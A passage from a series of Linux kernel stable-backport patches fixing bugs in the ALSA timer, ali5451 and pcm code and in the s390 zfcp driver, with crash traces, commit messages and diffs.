ioctl_preallocate+0x200/0x200 [] ? syscall_trace_enter+0x3cf/0xdb0 [] ? __context_tracking_exit.part.4+0x9a/0x1e0 [] ? exit_to_usermode_loop+0x190/0x190 [] ? check_preemption_disabled+0x37/0x1e0 [] ? security_file_ioctl+0x89/0xb0 [] SyS_ioctl+0x8f/0xc0 [] ? do_vfs_ioctl+0x1050/0x1050 [] do_syscall_64+0x1c4/0x4e0 [] entry_SYSCALL64_slow_path+0x25/0x25 Code: e8 fc 42 7b fe 8b 0d 06 8a 50 03 49 0f af cf 48 85 c9 0f 88 7c 01 00 00 48 89 4d a8 e8 e0 42 7b fe 48 8b 45 c0 48 8b 4d a8 48 99 <48> f7 f9 49 01 c7 e8 cb 42 7b fe 48 8b 55 d0 48 b8 00 00 00 00 RIP [] snd_hrtimer_callback+0x1da/0x3f0 RSP ---[ end trace 6aa380f756a21074 ]--- The problem happens when you call ioctl(SNDRV_TIMER_IOCTL_CONTINUE) on a completely new/unused timer -- it will have ->sticks == 0, which causes a divide by 0 in snd_hrtimer_callback(). Signed-off-by: Vegard Nossum Signed-off-by: Takashi Iwai Signed-off-by: Willy Tarreau --- sound/core/timer.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/core/timer.c b/sound/core/timer.c index f5ddc9bb459..f297eac3bdf 100644 --- a/sound/core/timer.c +++ b/sound/core/timer.c @@ -817,6 +817,7 @@ int snd_timer_new(struct snd_card *card, char *id, struct snd_timer_id *tid, timer->tmr_subdevice = tid->subdevice; if (id) strlcpy(timer->id, id, sizeof(timer->id)); + timer->sticks = 1; INIT_LIST_HEAD(&timer->device_list); INIT_LIST_HEAD(&timer->open_list_head); INIT_LIST_HEAD(&timer->active_list_head); From e13285a1e991fbe68223f0b62320866ceb9a5672 Mon Sep 17 00:00:00 2001 From: Vegard Nossum Date: Mon, 29 Aug 2016 00:33:51 +0200 Subject: [PATCH 128/315] ALSA: timer: fix NULL pointer dereference on memory allocation failure commit 8ddc05638ee42b18ba4fe99b5fb647fa3ad20456 upstream. I hit this with syzkaller: kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] PREEMPT SMP KASAN CPU: 0 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #190 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014 task: ffff88011278d600 task.stack: ffff8801120c0000 RIP: 0010:[] [] snd_hrtimer_start+0x77/0x100 RSP: 0018:ffff8801120c7a60 EFLAGS: 00010006 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000007 RDX: 0000000000000009 RSI: 1ffff10023483091 RDI: 0000000000000048 RBP: ffff8801120c7a78 R08: ffff88011a5cf768 R09: ffff88011a5ba790 R10: 0000000000000002 R11: ffffed00234b9ef1 R12: ffff880114843980 R13: ffffffff84213c00 R14: ffff880114843ab0 R15: 0000000000000286 FS: 00007f72958f3700(0000) GS:ffff88011aa00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000603001 CR3: 00000001126ab000 CR4: 00000000000006f0 Stack: ffff880114843980 ffff880111eb2dc0 ffff880114843a34 ffff8801120c7ad0 ffffffff82c81ab1 0000000000000000 ffffffff842138e0 0000000100000000 ffff880111eb2dd0 ffff880111eb2dc0 0000000000000001 ffff880111eb2dc0 Call Trace: [] snd_timer_start1+0x331/0x670 [] snd_timer_start+0x5d/0xa0 [] snd_timer_user_ioctl+0x88e/0x2830 [] ? __follow_pte.isra.49+0x430/0x430 [] ? snd_timer_pause+0x80/0x80 [] ? do_wp_page+0x3aa/0x1c90 [] ? put_prev_entity+0x108f/0x21a0 [] ? snd_timer_pause+0x80/0x80 [] do_vfs_ioctl+0x193/0x1050 [] ? cpuacct_account_field+0x12f/0x1a0 [] ? ioctl_preallocate+0x200/0x200 [] ? syscall_trace_enter+0x3cf/0xdb0 [] ? __context_tracking_exit.part.4+0x9a/0x1e0 [] ? exit_to_usermode_loop+0x190/0x190 [] ? check_preemption_disabled+0x37/0x1e0 [] ? security_file_ioctl+0x89/0xb0 [] SyS_ioctl+0x8f/0xc0 [] ? do_vfs_ioctl+0x1050/0x1050 [] do_syscall_64+0x1c4/0x4e0 [] entry_SYSCALL64_slow_path+0x25/0x25 Code: c7 c7 c4 b9 c8 82 48 89 d9 4c 89 ee e8 63 88 7f fe e8 7e 46 7b fe 48 8d 7b 48 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 04 84 c0 7e 65 80 7b 48 00 74 0e e8 52 46 RIP [] snd_hrtimer_start+0x77/0x100 RSP ---[ end trace 5955b08db7f2b029 ]--- This can happen if snd_hrtimer_open() fails to allocate memory and returns an error, which is currently not checked by snd_timer_open(): ioctl(SNDRV_TIMER_IOCTL_SELECT) - snd_timer_user_tselect() - snd_timer_close() - snd_hrtimer_close() - (struct snd_timer *) t->private_data = NULL - snd_timer_open() - snd_hrtimer_open() - kzalloc() fails; t->private_data is still NULL ioctl(SNDRV_TIMER_IOCTL_START) - snd_timer_user_start() - snd_timer_start() - snd_timer_start1() - snd_hrtimer_start() - t->private_data == NULL // boom [js] no put_device in 3.12 yet Signed-off-by: Vegard Nossum Signed-off-by: Takashi Iwai Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- sound/core/timer.c | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/sound/core/timer.c b/sound/core/timer.c index f297eac3bdf..749857a889e 100644 --- a/sound/core/timer.c +++ b/sound/core/timer.c @@ -291,8 +291,19 @@ int snd_timer_open(struct snd_timer_instance **ti, } timeri->slave_class = tid->dev_sclass; timeri->slave_id = slave_id; - if (list_empty(&timer->open_list_head) && timer->hw.open) - timer->hw.open(timer); + + if (list_empty(&timer->open_list_head) && timer->hw.open) { + int err = timer->hw.open(timer); + if (err) { + kfree(timeri->owner); + kfree(timeri); + + module_put(timer->module); + mutex_unlock(®ister_mutex); + return err; + } + } + list_add_tail(&timeri->open_list, &timer->open_list_head); snd_timer_check_master(timeri); mutex_unlock(®ister_mutex); From 3d4cfa9535c2fd7f8380462f67ad5bf4be690c82 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 21 Sep 2016 14:38:02 +0200 Subject: [PATCH 129/315] ALSA: ali5451: Fix out-of-bound position reporting commit db68577966abc1aeae4ec597b3dcfa0d56e92041 upstream. The pointer callbacks of ali5451 driver may return the value at the boundary occasionally, and it results in the kernel warning like snd_ali5451 0000:00:06.0: BUG: , pos = 16384, buffer size = 16384, period size = 1024 It seems that folding the position offset is enough for fixing the warning and no ill-effect has been seen by that. Reported-by: Enrico Mioso Tested-by: Enrico Mioso Signed-off-by: Takashi Iwai Signed-off-by: Willy Tarreau --- sound/pci/ali5451/ali5451.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sound/pci/ali5451/ali5451.c b/sound/pci/ali5451/ali5451.c index 53754f5edeb..097c8c4daae 100644 --- a/sound/pci/ali5451/ali5451.c +++ b/sound/pci/ali5451/ali5451.c @@ -1422,6 +1422,7 @@ snd_ali_playback_pointer(struct snd_pcm_substream *substream) spin_unlock(&codec->reg_lock); snd_ali_printk("playback pointer returned cso=%xh.\n", cso); + cso %= runtime->buffer_size; return cso; } @@ -1442,6 +1443,7 @@ static snd_pcm_uframes_t snd_ali_pointer(struct snd_pcm_substream *substream) cso = inw(ALI_REG(codec, ALI_CSO_ALPHA_FMS + 2)); spin_unlock(&codec->reg_lock); + cso %= runtime->buffer_size; return cso; } From a27178e05b7c332522df40904f27674e36ee3757 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Mon, 12 Dec 2016 17:33:06 +0100 Subject: [PATCH 130/315] ALSA: pcm : Call kill_fasync() in stream lock commit 3aa02cb664c5fb1042958c8d1aa8c35055a2ebc4 upstream. Currently kill_fasync() is called outside the stream lock in snd_pcm_period_elapsed(). This is potentially racy, since the stream may get released even during the irq handler is running. Although snd_pcm_release_substream() calls snd_pcm_drop(), this doesn't guarantee that the irq handler finishes, thus the kill_fasync() call outside the stream spin lock may be invoked after the substream is detached, as recently reported by KASAN. As a quick workaround, move kill_fasync() call inside the stream lock. The fasync is rarely used interface, so this shouldn't have a big impact from the performance POV. Ideally, we should implement some sync mechanism for the proper finish of stream and irq handler. But this oneliner should suffice for most cases, so far. Reported-by: Baozeng Ding Signed-off-by: Takashi Iwai Signed-off-by: Willy Tarreau --- sound/core/pcm_lib.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c index 8eddece217b..dfed3ef0247 100644 --- a/sound/core/pcm_lib.c +++ b/sound/core/pcm_lib.c @@ -1856,10 +1856,10 @@ void snd_pcm_period_elapsed(struct snd_pcm_substream *substream) if (substream->timer_running) snd_timer_interrupt(substream->timer, 1); _end: + kill_fasync(&runtime->fasync, SIGIO, POLL_IN); snd_pcm_stream_unlock_irqrestore(substream, flags); if (runtime->transfer_ack_end) runtime->transfer_ack_end(substream); - kill_fasync(&runtime->fasync, SIGIO, POLL_IN); } EXPORT_SYMBOL(snd_pcm_period_elapsed); From 6d35bb9a9f6ea7082c2f72b31a2ea4f6e4faf5b0 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:44 +0200 Subject: [PATCH 131/315] zfcp: fix fc_host port_type with NPIV commit bd77befa5bcff8c51613de271913639edf85fbc2 upstream. For an NPIV-enabled FCP device, zfcp can erroneously show "NPort (fabric via point-to-point)" instead of "NPIV VPORT" for the port_type sysfs attribute of the corresponding fc_host. s390-tools that can be affected are dbginfo.sh and ziomon. zfcp_fsf_exchange_config_evaluate() ignores fsf_qtcb_bottom_config.connection_features indicating NPIV and only sets fc_host_port_type to FC_PORTTYPE_NPORT if fsf_qtcb_bottom_config.fc_topology is FSF_TOPO_FABRIC. Only the independent zfcp_fsf_exchange_port_evaluate() evaluates connection_features to overwrite fc_host_port_type to FC_PORTTYPE_NPIV in case of NPIV. Code was introduced with upstream kernel 2.6.30 commit 0282985da5923fa6365adcc1a1586ae0c13c1617 ("[SCSI] zfcp: Report fc_host_port_type as NPIV"). This works during FCP device recovery (such as set online) because it performs FSF_QTCB_EXCHANGE_CONFIG_DATA followed by FSF_QTCB_EXCHANGE_PORT_DATA in sequence. However, the zfcp-specific scsi host sysfs attributes "requests", "megabytes", or "seconds_active" trigger only zfcp_fsf_exchange_config_evaluate() resetting fc_host port_type to FC_PORTTYPE_NPORT despite NPIV. The zfcp-specific scsi host sysfs attribute "utilization" triggers only zfcp_fsf_exchange_port_evaluate() correcting the fc_host port_type again in case of NPIV. Evaluate fsf_qtcb_bottom_config.connection_features in zfcp_fsf_exchange_config_evaluate() where it belongs to. Signed-off-by: Steffen Maier Fixes: 0282985da592 ("[SCSI] zfcp: Report fc_host_port_type as NPIV") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_fsf.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c index 9152999a070..8fa6bc49eeb 100644 --- a/drivers/s390/scsi/zfcp_fsf.c +++ b/drivers/s390/scsi/zfcp_fsf.c @@ -3,7 +3,7 @@ * * Implementation of FSF commands. * - * Copyright IBM Corp. 2002, 2013 + * Copyright IBM Corp. 2002, 2015 */ #define KMSG_COMPONENT "zfcp" @@ -513,7 +513,10 @@ static int zfcp_fsf_exchange_config_evaluate(struct zfcp_fsf_req *req) fc_host_port_type(shost) = FC_PORTTYPE_PTP; break; case FSF_TOPO_FABRIC: - fc_host_port_type(shost) = FC_PORTTYPE_NPORT; + if (bottom->connection_features & FSF_FEATURE_NPIV_MODE) + fc_host_port_type(shost) = FC_PORTTYPE_NPIV; + else + fc_host_port_type(shost) = FC_PORTTYPE_NPORT; break; case FSF_TOPO_AL: fc_host_port_type(shost) = FC_PORTTYPE_NLPORT; @@ -618,7 +621,6 @@ static void zfcp_fsf_exchange_port_evaluate(struct zfcp_fsf_req *req) if (adapter->connection_features & FSF_FEATURE_NPIV_MODE) { fc_host_permanent_port_name(shost) = bottom->wwpn; - fc_host_port_type(shost) = FC_PORTTYPE_NPIV; } else fc_host_permanent_port_name(shost) = fc_host_port_name(shost); fc_host_maxframe_size(shost) = bottom->maximum_frame_size; From 5f62704e887f04759e29870546895b0417391a80 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:45 +0200 Subject: [PATCH 132/315] zfcp: fix ELS/GS request&response length for hardware data router commit 70369f8e15b220f50a16348c79a61d3f7054813c upstream. In the hardware data router case, introduced with kernel 3.2 commit 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router") the ELS/GS request&response length needs to be initialized as in the chained SBAL case. Otherwise, the FCP channel rejects ELS requests with FSF_REQUEST_SIZE_TOO_LARGE. Such ELS requests can be issued by user space through BSG / HBA API, or zfcp itself uses ADISC ELS for remote port link test on RSCN. The latter can cause a short path outage due to unnecessary remote target port recovery because the always failing ADISC cannot detect extremely short path interruptions beyond the local FCP channel. Below example is decoded with zfcpdbf from s390-tools: Timestamp : ... Area : SAN Subarea : 00 Level : 1 Exception : - CPU id : .. Caller : zfcp_dbf_san_req+0408 Record id : 1 Tag : fssels1 Request id : 0x Destination ID : 0x00 Payload info : 52000000 00000000 [ADISC] 00 00000000 00000000 00000000 00000000 00000000 Timestamp : ... Area : HBA Subarea : 00 Level : 1 Exception : - CPU id : .. Caller : zfcp_dbf_hba_fsf_res+0740 Record id : 1 Tag : fs_ferr Request id : 0x Request status : 0x00000010 FSF cmnd : 0x0000000b [FSF_QTCB_SEND_ELS] FSF sequence no: 0x... FSF issued : ... FSF stat : 0x00000061 [FSF_REQUEST_SIZE_TOO_LARGE] FSF stat qual : 00000000 00000000 00000000 00000000 Prot stat : 0x00000100 Prot stat qual : 00000000 00000000 00000000 00000000 Signed-off-by: Steffen Maier Fixes: 86a9668a8d29 ("[SCSI] zfcp: support for hardware data router") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_fsf.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c index 8fa6bc49eeb..8e0979c11c8 100644 --- a/drivers/s390/scsi/zfcp_fsf.c +++ b/drivers/s390/scsi/zfcp_fsf.c @@ -990,8 +990,12 @@ static int zfcp_fsf_setup_ct_els_sbals(struct zfcp_fsf_req *req, if (zfcp_adapter_multi_buffer_active(adapter)) { if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_req)) return -EIO; + qtcb->bottom.support.req_buf_length = + zfcp_qdio_real_bytes(sg_req); if (zfcp_qdio_sbals_from_sg(qdio, &req->qdio_req, sg_resp)) return -EIO; + qtcb->bottom.support.resp_buf_length = + zfcp_qdio_real_bytes(sg_resp); zfcp_qdio_set_data_div(qdio, &req->qdio_req, zfcp_qdio_sbale_count(sg_req)); From efaebcb4aca935079fae695488217291ece9f512 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:46 +0200 Subject: [PATCH 133/315] zfcp: close window with unblocked rport during rport gone commit 4eeaa4f3f1d6c47b69f70e222297a4df4743363e upstream. On a successful end of reopen port forced, zfcp_erp_strategy_followup_success() re-uses the port erp_action and the subsequent zfcp_erp_action_cleanup() now sees ZFCP_ERP_SUCCEEDED with erp_action->action==ZFCP_ERP_ACTION_REOPEN_PORT instead of ZFCP_ERP_ACTION_REOPEN_PORT_FORCED but must not perform zfcp_scsi_schedule_rport_register(). We can detect this because the fresh port reopen erp_action is in its very first step ZFCP_ERP_STEP_UNINITIALIZED. Otherwise this opens a time window with unblocked rport (until the followup port reopen recovery would block it again). If a scsi_cmnd timeout occurs during this time window fc_timed_out() cannot work as desired and such command would indeed time out and trigger scsi_eh. This prevents a clean and timely path failover. This should not happen if the path issue can be recovered on FC transport layer such as path issues involving RSCNs. Also, unnecessary and repeated DID_IMM_RETRY for pending and undesired new requests occur because internally zfcp still has its zfcp_port blocked. As follow-on errors with scsi_eh, it can cause, in the worst case, permanently lost paths due to one of: sd : [] Medium access timeout failure. Offlining disk! sd : Device offlined - not ready after error recovery For fix validation and to aid future debugging with other recoveries we now also trace (un)blocking of rports. Signed-off-by: Steffen Maier Fixes: 5767620c383a ("[SCSI] zfcp: Do not unblock rport from REOPEN_PORT_FORCED") Fixes: a2fa0aede07c ("[SCSI] zfcp: Block FC transport rports early on errors") Fixes: 5f852be9e11d ("[SCSI] zfcp: Fix deadlock between zfcp ERP and SCSI") Fixes: 338151e06608 ("[SCSI] zfcp: make use of fc_remote_port_delete when target port is unavailable") Fixes: 3859f6a248cb ("[PATCH] zfcp: add rports to enable scsi_add_device to work again") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.h | 7 ++++++- drivers/s390/scsi/zfcp_erp.c | 12 +++++++++--- drivers/s390/scsi/zfcp_scsi.c | 8 +++++++- 3 files changed, 22 insertions(+), 5 deletions(-) diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h index 3ac7a4b30dd..b5afa3d01e9 100644 --- a/drivers/s390/scsi/zfcp_dbf.h +++ b/drivers/s390/scsi/zfcp_dbf.h @@ -2,7 +2,7 @@ * zfcp device driver * debug feature declarations * - * Copyright IBM Corp. 2008, 2010 + * Copyright IBM Corp. 2008, 2015 */ #ifndef ZFCP_DBF_H @@ -17,6 +17,11 @@ #define ZFCP_DBF_INVALID_LUN 0xFFFFFFFFFFFFFFFFull +enum zfcp_dbf_pseudo_erp_act_type { + ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD = 0xff, + ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL = 0xfe, +}; + /** * struct zfcp_dbf_rec_trigger - trace record for triggered recovery action * @ready: number of ready recovery actions diff --git a/drivers/s390/scsi/zfcp_erp.c b/drivers/s390/scsi/zfcp_erp.c index 8e8f3533d2a..b4cd26d2415 100644 --- a/drivers/s390/scsi/zfcp_erp.c +++ b/drivers/s390/scsi/zfcp_erp.c @@ -3,7 +3,7 @@ * * Error Recovery Procedures (ERP). * - * Copyright IBM Corp. 2002, 2010 + * Copyright IBM Corp. 2002, 2015 */ #define KMSG_COMPONENT "zfcp" @@ -1225,8 +1225,14 @@ static void zfcp_erp_action_cleanup(struct zfcp_erp_action *act, int result) break; case ZFCP_ERP_ACTION_REOPEN_PORT: - if (result == ZFCP_ERP_SUCCEEDED) - zfcp_scsi_schedule_rport_register(port); + /* This switch case might also happen after a forced reopen + * was successfully done and thus overwritten with a new + * non-forced reopen at `ersfs_2'. In this case, we must not + * do the clean-up of the non-forced version. + */ + if (act->step != ZFCP_ERP_STEP_UNINITIALIZED) + if (result == ZFCP_ERP_SUCCEEDED) + zfcp_scsi_schedule_rport_register(port); /* fall through */ case ZFCP_ERP_ACTION_REOPEN_PORT_FORCED: put_device(&port->dev); diff --git a/drivers/s390/scsi/zfcp_scsi.c b/drivers/s390/scsi/zfcp_scsi.c index 7b353647cb9..38ee0df633a 100644 --- a/drivers/s390/scsi/zfcp_scsi.c +++ b/drivers/s390/scsi/zfcp_scsi.c @@ -3,7 +3,7 @@ * * Interface to Linux SCSI midlayer. * - * Copyright IBM Corp. 2002, 2013 + * Copyright IBM Corp. 2002, 2015 */ #define KMSG_COMPONENT "zfcp" @@ -577,6 +577,9 @@ static void zfcp_scsi_rport_register(struct zfcp_port *port) ids.port_id = port->d_id; ids.roles = FC_RPORT_ROLE_FCP_TARGET; + zfcp_dbf_rec_trig("scpaddy", port->adapter, port, NULL, + ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD, + ZFCP_PSEUDO_ERP_ACTION_RPORT_ADD); rport = fc_remote_port_add(port->adapter->scsi_host, 0, &ids); if (!rport) { dev_err(&port->adapter->ccw_device->dev, @@ -598,6 +601,9 @@ static void zfcp_scsi_rport_block(struct zfcp_port *port) struct fc_rport *rport = port->rport; if (rport) { + zfcp_dbf_rec_trig("scpdely", port->adapter, port, NULL, + ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL, + ZFCP_PSEUDO_ERP_ACTION_RPORT_DEL); fc_remote_port_delete(rport); port->rport = NULL; } From 909987d41f751b873d84be1df7ae0c4dea394221 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:47 +0200 Subject: [PATCH 134/315] zfcp: retain trace level for SCSI and HBA FSF response records commit 35f040df97fa0e94c7851c054ec71533c88b4b81 upstream. While retaining the actual filtering according to trace level, the following commits started to write such filtered records with a hardcoded record level of 1 instead of the actual record level: commit 250a1352b95e1db3216e5c5d4f4365bea5122f4a ("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.") commit a54ca0f62f953898b05549391ac2a8a4dad6482b ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.") Now we can distinguish written records again for offline level filtering. Signed-off-by: Steffen Maier Fixes: 250a1352b95e ("[SCSI] zfcp: Redesign of the debug tracing for SCSI records.") Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 11 ++++++----- drivers/s390/scsi/zfcp_dbf.h | 4 ++-- drivers/s390/scsi/zfcp_ext.h | 7 ++++--- 3 files changed, 12 insertions(+), 10 deletions(-) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index e1a8cc2526e..8f668c609ba 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -3,7 +3,7 @@ * * Debug traces for zfcp. * - * Copyright IBM Corp. 2002, 2010 + * Copyright IBM Corp. 2002, 2015 */ #define KMSG_COMPONENT "zfcp" @@ -58,7 +58,7 @@ void zfcp_dbf_pl_write(struct zfcp_dbf *dbf, void *data, u16 length, char *area, * @tag: tag indicating which kind of unsolicited status has been received * @req: request for which a response was received */ -void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req) +void zfcp_dbf_hba_fsf_res(char *tag, int level, struct zfcp_fsf_req *req) { struct zfcp_dbf *dbf = req->adapter->dbf; struct fsf_qtcb_prefix *q_pref = &req->qtcb->prefix; @@ -90,7 +90,7 @@ void zfcp_dbf_hba_fsf_res(char *tag, struct zfcp_fsf_req *req) rec->pl_len, "fsf_res", req->req_id); } - debug_event(dbf->hba, 1, rec, sizeof(*rec)); + debug_event(dbf->hba, level, rec, sizeof(*rec)); spin_unlock_irqrestore(&dbf->hba_lock, flags); } @@ -392,7 +392,8 @@ void zfcp_dbf_san_in_els(char *tag, struct zfcp_fsf_req *fsf) * @sc: pointer to struct scsi_cmnd * @fsf: pointer to struct zfcp_fsf_req */ -void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf) +void zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *sc, + struct zfcp_fsf_req *fsf) { struct zfcp_adapter *adapter = (struct zfcp_adapter *) sc->device->host->hostdata[0]; @@ -434,7 +435,7 @@ void zfcp_dbf_scsi(char *tag, struct scsi_cmnd *sc, struct zfcp_fsf_req *fsf) } } - debug_event(dbf->scsi, 1, rec, sizeof(*rec)); + debug_event(dbf->scsi, level, rec, sizeof(*rec)); spin_unlock_irqrestore(&dbf->scsi_lock, flags); } diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h index b5afa3d01e9..97f46e6964d 100644 --- a/drivers/s390/scsi/zfcp_dbf.h +++ b/drivers/s390/scsi/zfcp_dbf.h @@ -284,7 +284,7 @@ static inline void zfcp_dbf_hba_fsf_resp(char *tag, int level, struct zfcp_fsf_req *req) { if (level <= req->adapter->dbf->hba->level) - zfcp_dbf_hba_fsf_res(tag, req); + zfcp_dbf_hba_fsf_res(tag, level, req); } /** @@ -323,7 +323,7 @@ void _zfcp_dbf_scsi(char *tag, int level, struct scsi_cmnd *scmd, scmd->device->host->hostdata[0]; if (level <= adapter->dbf->scsi->level) - zfcp_dbf_scsi(tag, scmd, req); + zfcp_dbf_scsi(tag, level, scmd, req); } /** diff --git a/drivers/s390/scsi/zfcp_ext.h b/drivers/s390/scsi/zfcp_ext.h index 1d3dd3f7d69..1282165d778 100644 --- a/drivers/s390/scsi/zfcp_ext.h +++ b/drivers/s390/scsi/zfcp_ext.h @@ -3,7 +3,7 @@ * * External function declarations. * - * Copyright IBM Corp. 2002, 2010 + * Copyright IBM Corp. 2002, 2015 */ #ifndef ZFCP_EXT_H @@ -50,7 +50,7 @@ extern void zfcp_dbf_rec_trig(char *, struct zfcp_adapter *, struct zfcp_port *, struct scsi_device *, u8, u8); extern void zfcp_dbf_rec_run(char *, struct zfcp_erp_action *); extern void zfcp_dbf_hba_fsf_uss(char *, struct zfcp_fsf_req *); -extern void zfcp_dbf_hba_fsf_res(char *, struct zfcp_fsf_req *); +extern void zfcp_dbf_hba_fsf_res(char *, int, struct zfcp_fsf_req *); extern void zfcp_dbf_hba_bit_err(char *, struct zfcp_fsf_req *); extern void zfcp_dbf_hba_berr(struct zfcp_dbf *, struct zfcp_fsf_req *); extern void zfcp_dbf_hba_def_err(struct zfcp_adapter *, u64, u16, void **); @@ -58,7 +58,8 @@ extern void zfcp_dbf_hba_basic(char *, struct zfcp_adapter *); extern void zfcp_dbf_san_req(char *, struct zfcp_fsf_req *, u32); extern void zfcp_dbf_san_res(char *, struct zfcp_fsf_req *); extern void zfcp_dbf_san_in_els(char *, struct zfcp_fsf_req *); -extern void zfcp_dbf_scsi(char *, struct scsi_cmnd *, struct zfcp_fsf_req *); +extern void zfcp_dbf_scsi(char *, int, struct scsi_cmnd *, + struct zfcp_fsf_req *); /* zfcp_erp.c */ extern void zfcp_erp_set_adapter_status(struct zfcp_adapter *, u32); From 053077252df5beb5109d32904de4830e78e8eaa0 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:48 +0200 Subject: [PATCH 135/315] zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace commit 0102a30a6ff60f4bb4c07358ca3b1f92254a6c25 upstream. bring back commit d21e9daa63e009ce5b87bbcaa6d11ce48e07bbbe ("[SCSI] zfcp: Dont use 0 to indicate invalid LUN in rec trace") which was lost with commit ae0904f60fab7cb20c48d32eefdd735e478b91fb ("[SCSI] zfcp: Redesign of the debug tracing for recovery actions.") Signed-off-by: Steffen Maier Fixes: ae0904f60fab ("[SCSI] zfcp: Redesign of the debug tracing for recovery actions.") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index 8f668c609ba..394d5d43945 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -234,7 +234,8 @@ static void zfcp_dbf_set_common(struct zfcp_dbf_rec *rec, if (sdev) { rec->lun_status = atomic_read(&sdev_to_zfcp(sdev)->status); rec->lun = zfcp_scsi_dev_lun(sdev); - } + } else + rec->lun = ZFCP_DBF_INVALID_LUN; } /** From 69169095719608196f75eff1d57f22cb38817e48 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:49 +0200 Subject: [PATCH 136/315] zfcp: trace on request for open and close of WKA port commit d27a7cb91960cf1fdd11b10071e601828cbf4b1f upstream. Since commit a54ca0f62f953898b05549391ac2a8a4dad6482b ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.") HBA records no longer contain WWPN, D_ID, or LUN to reduce duplicate information which is already in REC records. In contrast to "regular" target ports, we don't use recovery to open WKA ports such as directory/nameserver, so we don't get REC records. Therefore, introduce pseudo REC running records without any actual recovery action but including D_ID of WKA port on open/close. Signed-off-by: Steffen Maier Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 32 ++++++++++++++++++++++++++++++++ drivers/s390/scsi/zfcp_ext.h | 1 + drivers/s390/scsi/zfcp_fsf.c | 8 ++++++-- 3 files changed, 39 insertions(+), 2 deletions(-) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index 394d5d43945..e99b3d68604 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -314,6 +314,38 @@ void zfcp_dbf_rec_run(char *tag, struct zfcp_erp_action *erp) spin_unlock_irqrestore(&dbf->rec_lock, flags); } +/** + * zfcp_dbf_rec_run_wka - trace wka port event with info like running recovery + * @tag: identifier for event + * @wka_port: well known address port + * @req_id: request ID to correlate with potential HBA trace record + */ +void zfcp_dbf_rec_run_wka(char *tag, struct 